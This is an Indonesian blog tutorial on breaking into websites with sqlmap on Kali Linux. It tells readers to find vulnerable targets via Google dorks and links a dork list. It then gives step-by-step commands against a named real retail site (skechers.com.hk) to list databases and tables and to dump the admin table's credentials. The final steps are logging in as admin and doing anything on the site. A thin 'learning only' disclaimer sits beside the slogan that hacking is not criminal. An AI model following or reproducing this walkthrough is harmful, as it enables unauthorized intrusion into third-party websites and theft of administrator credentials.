Berbagi

Ilmu Tentang IT

Networking, Sistem Operasi Linux, Mikrotik
Windows
sosmed
HACK WEBSITE MENGGUNAKAN SQLMAP DI KALI LINUX

HACK WEBSITE MENGGUNAKAN SQLMAP DI KALI LINUX

Add Comment Edit

ASSALLAMUALAIKUM WR WB

kali ini saya ingin memposting bagaiamana cara hack website menggunakan sqlmap di kali linux
oke langsung saja ke TKP

sebelum melakukan hacking jangan lupa siapkan target yang sudah vuln terhadap sql injection
bisa mencarinya dengan google dork atau menggunakan uniscan , owasp-zap, nikto , vega dll

download google dork disini
http://www.4shared.com/office/EST7GaQ2ba/dork_sql.html

jika sudah mendapatkan target

1. buka terminal
    jika ingin melihat option pada sqlmap
    ketik dengan  perintah : sqlmap -h


2. untuk melakukan hacking berikan perintah :

   sqlmap -u www.target.com/syntaxerrorr=2

CONTOH:

   sqlmap -u www.skechers.com.hk/product.php?id=1152 --dbs


disini menandakan bahwa website tersebut vuln & jika ada pesan berikut tekan    y     lalu  enter


di dalam kasus saya, saya mendapatkan 2 buah database & copy database tersebut untuk melanjutkan sql


3. lanjutkan lagi dengan perintah
    untuk melihat isi tables

    sqlmap -u www.target-anda.com/php?id=sekian -D database-target --tables

CONTOH:
    sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb --tables

   bisa langsung lompat untuk melihat columns dengan perintah
 
   sqlmap -u www.target-anda.com/php?id=sekian -D database-target --columns

CONTOH :

   sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb --columns

tetapi dalam kasus saya , saya lupa untuk menggunakan columns
hehehe
oke gak apa-apa kita lanjutkan saja

4. Disini saya sudah mendapatkan tabel serta daftar dari website tersebut
    cari table atau columns yang berisikan nama user / admin / password atau apalah yang terhubung dengan username / password


5. saatnya mencari password  & user admin
    dengan perintah :

sqlmap -u www.target-anda.com/php?id=sekian -D database-target -T admin --dump

CONTOH:
    sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb -T bz_admin --dump




dan secara otomatis sqlmap akan mencari user & password admin yang tersimpan pada website tersebut


6. cari halaman login admin website tersebut & masukan username & password yang telah kita dapatkan


7 . LOGIN :D


8. masuk ke dalam directory & kalian bebas melakukan apapun pada website tersebut



jika masih kurang jelas dalam penulisan saya
anda bisa menonton video saya disini
https://www.youtube.com/watch?v=1c2Jx25XwBk

di dalam video saya tidak ada manipulasi semuanya real (asli) tanpa ada editan sedikitpun


SEKIAN DARI SAYA
ASSALLAMUALAIKUM WR WB

INI HANYA PEMBELAJARAN
KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG ANDA LAKUKAN TERHADAP WEBSITE ORANG LAIN


HACKING IS NOT CRIMINAL
HACKING IS ART

"the quieter you become , the more you are able to hear"

Share this:

ABOUTME

Hi all. This is deepak from Bthemez. We're providing content for Bold site and we’ve been in internet, social media and affiliate for too long time and its my profession. We are web designer & developer living India! What can I say, we are the best..

View all posts [..]

JOIN CONVERSATION

    Blogger Comment

0 komentar:

Posting Komentar

Langganan: Posting Komentar ( Atom )